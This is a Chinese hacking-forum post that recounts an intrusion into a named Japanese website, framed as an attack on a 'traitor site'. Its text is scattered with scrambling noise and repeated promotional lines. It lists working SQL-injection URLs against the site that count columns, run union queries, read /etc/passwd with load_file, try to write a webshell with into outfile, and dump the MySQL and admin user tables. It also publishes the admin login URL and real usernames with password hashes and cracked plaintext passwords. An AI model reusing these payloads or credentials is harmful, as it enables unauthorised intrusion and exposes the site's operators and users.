原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

0x01. 检测 www.zuaa.jp 收集数据
) x! s1 m8 G3 d) i8 p7 Z9 C
' L' `& X( W1 W- p) j$ Y+ C
" l) M6 j5 V- T! y+ kwhatweb
: k3 G# ^9 e1 p& g* {/ r+ {
" v% t9 ?; @/ a6 R. G3 E( [2 p
& O8 a* R' W) g9 p! J7 M3 k7 Z利用NMAP扫描
5 P' w. x6 D- U, n+ j7 J1 _
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
" N4 S+ D' B1 g$ w( _* T找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390


0x03.order by
. H9 B% v) ?, k" d             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
- k: ^4 \3 u: w$ K" `3 }% R) v# m6 X
1 R: R- G1 Y- R9 Porder by 28报错，order by 27正常

% v3 Q" g1 c- Y4 V- j$ l0x04.   union手动查询
- L* M" V5 E7 C" a+ ?http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
+ ]$ F0 R8 z" c. w$ b添加到 27 时正常显示

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x05. info:
+ ?, Z- g8 a4 i. Phttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
( X( u$ Y* _6 w' w2 D7 W
user:            root@localhost
database:    openpne
! Q% Q7 D0 J- g& Sversion:      4.1.22
os:             portbld-freebsd5.4
$ }/ l9 @' ]( v3 {
6 Y+ N( c* i# g! w% N- l$ O9 [0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
: `# G. b0 M# I' G# }! ?7 E0 z  r
通过工具转换

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
( w6 i$ b, m3 q3 ~' K
7 k# ~+ O, U6 J* a0x07. 利用 into outfile
全部都失败
3 s; C( \3 v: l, ~  G* f$ X  Qhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
2 x8 x* P5 t# M3 W
) Q; F* _8 o# b! s1 G% nhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”
+ c0 ?) O( j  v: B9 D$ n- D
" \8 v, C1 E( S# U& A) u0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
2 O: b4 n, f. R- ]7 s& w* N  w6 L
8 z; U% v, W+ O' ^* P! ~
( s7 Q4 ?! ^3 F. i
3 M; P- {" G# G+ E+ v% U0x09. 查找后台
4 D1 H$ j+ Z# A$ q利用 现有的各种 后台工具尝试都不行
1 V: M5 ?; S6 q2 i; P. \9 q
0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
2 Y5 K* R) W; D3 I. o可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

这个可以在 www.cmd5.com 解密
3 }- q- M, K' Xroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
1 B  A% n/ s0 ]) d% Azuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
: z' L, K& z1 V/ O工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知


, i! J- I7 t5 y1 N; {0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码

% G- [3 {$ ~+ {
0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login

( |) w" }: @0 v: d; o  ~表名 (c_admin_user) ，字段名（username,password）
! I1 [) a) O6 j2 A4 l3 F' r$ ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
, I. S0 t. O/ L+ w. ]
解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
. ^$ h3 b4 R3 K* D: d
- ?( E# o# `9 h  c+ @; `% W中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

9 C! e  s2 S. G" q: d2 @0x13. 登录后台
0 d+ u4 T6 u3 g$ Y# y3 J) L
: Q* S' ~4 t8 W# \( Z- G
1 m) A3 d1 }8 z  I/ |
5 z; I% _: O3 O& b" z, I0 o0x14. 小结
/ ]8 a% M) ]: q. [  I/ f" n利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
0 @6 R/ t* Y9 N------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
5 J. R8 V4 V* O中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！

荒村狂客

哪个牛人 费的这劲 入侵的